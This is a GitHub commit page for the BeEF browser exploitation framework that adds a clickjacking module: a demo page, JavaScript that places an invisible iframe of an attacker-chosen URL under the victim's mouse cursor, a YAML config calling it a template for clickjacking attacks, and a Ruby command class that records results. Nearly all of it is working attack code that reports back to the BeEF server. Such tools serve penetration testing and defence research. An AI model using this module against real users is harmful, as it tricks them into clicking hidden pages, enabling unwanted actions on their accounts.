Permalink
Browse files

Added clickjacking module

Fixes issue 105
  • Loading branch information...
bcoles committed May 30, 2012
1 parent fdd9d2c commit 9e2ac56ea65bb628106d8aa95ee165c890558f8a
@@ -0,0 +1,4 @@
+<p>&nbsp;</p>
+<a href="#" onclick="javascript:alert('You clicked a link at '+window.location);">moooooooo</a>
+<p>&nbsp;</p>
+
@@ -0,0 +1,92 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var offset_top = "<%= @offset_top %>";
+ var offset_left = "<%= @offset_left %>";
+ var url = "<%= @url %>";
+
+ var debug = false;
+ if (debug) opacity = 10; else opacity = 0;
+
+ // create container
+ var cjcontainer = document.createElement('div');
+ cjcontainer.id = "cjcontainer";
+ cjcontainer.setAttribute("style", "-moz-opacity:"+opacity);
+ cjcontainer.style.zIndex = 999;
+ cjcontainer.style.border = "none";
+ cjcontainer.style.width = "30px";
+ cjcontainer.style.height = "20px";
+ cjcontainer.style.overflow = "hidden";
+ cjcontainer.style.position = "absolute";
+ cjcontainer.style.opacity = opacity;
+ cjcontainer.style.filter = "alpha(opacity="+opacity+")";
+ cjcontainer.style.cursor = "default";
+ document.body.appendChild(cjcontainer);
+
+ // create iframe
+ var cjiframe = document.createElement('iframe');
+ cjiframe.id = "cjiframe";
+ cjiframe.src = url;
+ cjiframe.scrolling = "no";
+ cjiframe.frameBorder = "0";
+ cjiframe.allowTransparency = "true";
+ cjiframe.style.overflow = "hidden";
+ cjiframe.style.position = "absolute";
+ cjiframe.style.top = offset_top+"px";
+ cjiframe.style.left = offset_left+"px";
+ cjiframe.style.width = "200px";
+ cjiframe.style.height = "100px";
+ cjiframe.style.border = "none";
+ cjiframe.style.cursor = "default";
+ cjcontainer.appendChild(cjiframe);
+
+ // followmouse code by rsnake
+ // http://ha.ckers.org/weird/followmouse.html
+ // modified by bcoles
+ function followmouse(e){
+
+ var xcoord = 0;
+ var ycoord = 0;
+ var gettrailobj = function() {
+ if (document.getElementById)
+ return document.getElementById("cjcontainer").style;
+ else if (document.all)
+ return document.all.container.style;
+ }
+ if (typeof e != "undefined") {
+ xcoord += e.pageX - 10;
+ ycoord += e.pageY - 15;
+ } else if (typeof window.event != "undefined") {
+ xcoord += document.body.scrollLeft + event.clientX;
+ ycoord += document.body.scrollTop + event.clientY;
+ }
+ var docwidth = document.all ? document.body.scrollLeft + document.body.clientWidth : pageXOffset+window.innerWidth - 15;
+ var docheight = document.all ? Math.max(document.body.scrollHeight, document.body.clientHeight) : Math.max(document.body.offsetHeight, window.innerHeight)
+ gettrailobj().left = xcoord + "px";
+ gettrailobj().top = ycoord + "px";
+ }
+
+ // hook to mousemove event
+ if (window.addEventListener) {
+ window.addEventListener('mousemove', followmouse, false);
+ } else if (window.attachEvent) {
+ window.attachEvent('mousemove', followmouse);
+ }
+
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'clickjack=hooked mousemove event');
+
+});
@@ -0,0 +1,27 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ clickjacking:
+ enable: true
+ category: "Social Engineering"
+ name: "Clickjacking"
+ description: "This module serves as a template for clickjacking attacks.<br />Simply specify the target URL and the offset (in pixels) for the iframe content. The iframe will follow the mouse cursor."
+ authors: ["bcoles"]
+ target:
+ user_notify: ["FF", "C"]
+ not_working: ["IE"]
+
@@ -0,0 +1,34 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Clickjacking < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/demos/clickjack.html"
+ return [
+ { 'name' => 'url', 'description' => 'Target URL', 'ui_label' => 'Target URL', 'value' => uri, 'width'=>'400px' },
+ { 'name' => 'offset_top', 'description' => 'Offset Top (in pixels)', 'ui_label' => 'Offset Top (px)', 'value' => '-40', 'width'=>'150px' },
+ { 'name' => 'offset_left', 'description' => 'Offset Left (in pixels)', 'ui_label' => 'Offset Left (px)', 'value' => '-10', 'width'=>'150px' }
+ ]
+ end
+
+ def post_execute
+ content = {}
+ content['clickjack'] = @datastore['clickjack']
+ save content
+ end
+
+end

0 comments on commit 9e2ac56

Please sign in to comment.